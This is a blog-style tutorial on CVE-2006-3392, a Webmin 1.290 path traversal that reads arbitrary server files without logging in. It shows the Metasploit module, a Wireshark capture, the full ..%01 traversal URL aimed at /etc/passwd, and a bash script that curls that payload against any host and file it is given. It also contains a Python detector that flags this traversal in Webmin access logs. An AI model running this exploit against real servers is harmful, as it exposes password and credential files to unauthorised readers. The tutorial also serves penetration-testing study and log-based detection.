CVE-2006-3392 Webmin 1.290 Usermin 1.220 auxiliary(admin/webmin/file_disclosure)

CVE-2006-3392

Hello hackers!

Today we will talk about Webmin, its vulnerability, and we will write our own script to exploit it.
 
First of all, let's explain what Webmin is. Webmin is a web-based system configuration tool for Unix-like systems. It allows the user to configure operating system internals such as users, disk quotas, services, or configuration files, as well as modify and control open-source applications such as the Apache HTTP Server, PHP, or MySQL.
Webmin versions 1.290 and earlier contain a path traversal vulnerability, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused by an unspecified error in the handling of a URL. It can be exploited to read the contents of any file on the server via a specially crafted URL, without requiring a valid login.
Let’s look at it.
(screenshot: Webmin login page, showing version 1.290)

To exploit the vulnerability, start msfconsole, load the auxiliary/admin/webmin/file_disclosure module, and set the parameters: in our case RHOSTS => localhost, RPORT => 80, and RPATH (the file to read) => /etc/passwd.

(screenshot: options of the auxiliary/admin/webmin/file_disclosure module in msfconsole)

And just run it.

As you can see, we successfully read the /etc/passwd file on localhost.

(screenshot: msf5 auxiliary(admin/webmin/file_disclosure) > run, returning the file contents)

Now let's try to figure out how it actually works. This will help us better understand the module, write our own exploit, and pwn some OSCP-like machines without msfconsole 😉

First of all, we have to read the source of the msf module and see what it does.

(screenshot: locating the module source at /usr/share/metasploit-framework/modules/auxiliary/admin/webmin/file_disclosure.rb)

Examining the script shows that the payload is a simple HTTP request to the vulnerable host.

(screenshot: the main payload in file_disclosure.rb)

If you weren't able to understand the code, that's OK 🙂 I wasn't able to do it on the first attempt either. Let's try something more understandable: let's grab some packets 😉

All we have to do is open Wireshark and run our Metasploit module again.

As you can see, the data in the 4th row looks familiar: /..%01. Let's go deeper and analyze the stream.

(screenshot: Wireshark capture of the msf module's request)

To do that, select the row, right-click, choose Follow and then TCP Stream.

(screenshot: Follow TCP Stream)

Wow, that's extremely clear and looks familiar: the /..%01/ characters were in the msf script. So, the full payload is

http://localhost:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

(screenshot: the HTTP stream showing the request URL above)

Let's check it manually, i.e. paste the string into the browser's address bar.

(screenshot: the payload entered in the browser address bar)
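Because the traversal is hidden behind ..%01, a defender who greps access logs for a literal "../" will miss this request. The following is an added Python example (not part of the original post or of the Webmin project) that reads Common Log Format lines, percent-decodes each request path, and flags requests under /unauthenticated/ that contain a ".." segment once decoded; the log lines are constructed samples, not real captures.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in Common Log Format (the format Webmin's miniserv.log
# uses); they are made up for this example, not real captures.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jun/2019:12:00:01 +0000] "GET /session_login.cgi HTTP/1.1" 200 1234
127.0.0.1 - - [10/Jun/2019:12:00:05 +0000] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 2118
10.0.0.5 - - [10/Jun/2019:12:01:07 +0000] "GET /unauthenticated/style.css HTTP/1.1" 200 512
10.0.0.5 - - [10/Jun/2019:12:02:09 +0000] "GET /unauthenticated/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 403 0
"""

CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decoded_segments(raw_path):
    """Percent-decode the path (query string dropped) and split it on '/'.
    Control and non-ASCII bytes are stripped from each segment, so the page's
    '..%01' (which decodes to '..' plus a 0x01 byte) compares equal to '..';
    a check that only looks for a literal '../' would miss that form."""
    decoded = unquote_to_bytes(raw_path.split("?", 1)[0])
    return [bytes(b for b in seg if 0x20 <= b < 0x7F).decode("ascii")
            for seg in decoded.split(b"/")]

def is_traversal(raw_path):
    """True if any decoded path segment is exactly '..'."""
    return ".." in decoded_segments(raw_path)

def scan_log(text):
    """Return CVE-2006-3392-style requests found in CLF log text."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m or not m.group("path").startswith("/unauthenticated/"):
            continue
        segs = decoded_segments(m.group("path"))
        if ".." not in segs:
            continue
        # The file being read is whatever follows the last '..' segment.
        last = len(segs) - 1 - segs[::-1].index("..")
        hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                     "target": "/" + "/".join(segs[last + 1:]),
                     "served": m.group("status") == "200"})  # 200 suggests the file was served
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```

Feed it a real miniserv.log to see which hosts attempted the traversal and whether the server answered with a 200.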

The last thing we have to do is create a universal script.

As the host we define localhost (change it according to your needs), the port is the default Webmin port, then come the payload path and the file we want to read (passed as an input parameter).

After that, just curl it in silent mode and... launch 🙂

#!/bin/bash

# Target host and port (change them according to your needs; 10000 is the default Webmin port)
host="localhost"
port="10000"
# Traversal path taken from the captured request
path="/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01"
# File to read, passed as the first argument (e.g. /etc/passwd)
file=$1

#exploit
curl -s "$host:$port$path$file"

(screenshot: proof of concept, ./CVE-2006-3392.sh /etc/passwd)

The GitHub repository is available at https://github.com/IvanGlinkin/CVE-2006-3392